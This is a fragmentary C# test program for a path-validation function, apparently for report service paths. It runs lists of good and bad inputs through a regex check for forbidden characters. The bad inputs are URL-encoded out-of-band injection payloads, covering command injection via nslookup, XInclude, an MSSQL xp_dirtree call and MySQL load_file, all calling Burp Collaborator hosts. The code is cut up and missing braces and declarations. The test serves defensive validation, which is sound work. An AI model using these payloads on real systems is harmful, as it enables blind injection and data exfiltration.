using System.Text.RegularExpressions;
public static void Main()
"%2f'%22%600%26nslookup%20-q%3dcname%20mc2oeuqe62sdobw7l00p3l95dwjw7r5f23tqje8.burpcollaborator.net.%26%60'",
"%3chcm%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2f7em9gfsz8nuyqwysnl2a56bqfhlh97x8l08rwg.burpcollaborator.net%2ffoo%22%2f%3e%3c%2fhcm%3e",
"%2f')%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5cbhwdjjv3brx2t01wqp5e8aeuilolcga41xpoce03.burpcollab'%2b'orator.net%5cllc'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20",
"%2f'%2b(select%20load_file('%5c%5c%5c%5czx01z7brrfdq9ohk6dl2oyuiy949s4qshv5mscg1.burpcollaborator.net%5c%5cyza'))%2b'", "https://asdasdsadasd.co.uk",
"0972b8ns3gprlptliex30z6jaaga452tuhl4bs0.burpcollaborator.net",
"ReportService2010.asmx",
"/2nd TestReport with a relatively long name etc. blah"
Console.WriteLine("######## bad ########"); foreach (var url in badUrls) { var decodedUrl = Uri.UnescapeDataString(url);
var isValid = ValidatePath(decodedUrl);
Console.WriteLine(decodedUrl + ": " + isValid);
Console.WriteLine("######## good ########"); foreach (var url in validUrls) { var decodedUrl = Uri.UnescapeDataString(url);
var isValid = ValidatePath(decodedUrl);
Console.WriteLine(decodedUrl + ": " + isValid);
public static bool ValidatePath(string path)
result &= !string.IsNullOrEmpty(path);
var invalidChars = new char[] { '\\', '&', '"', '@', '$', ';' }; var containsABadCharacter = new Regex("[" + Regex.Escape(new string(invalidChars)) + "]");
result &= !(containsABadCharacter.IsMatch(path));
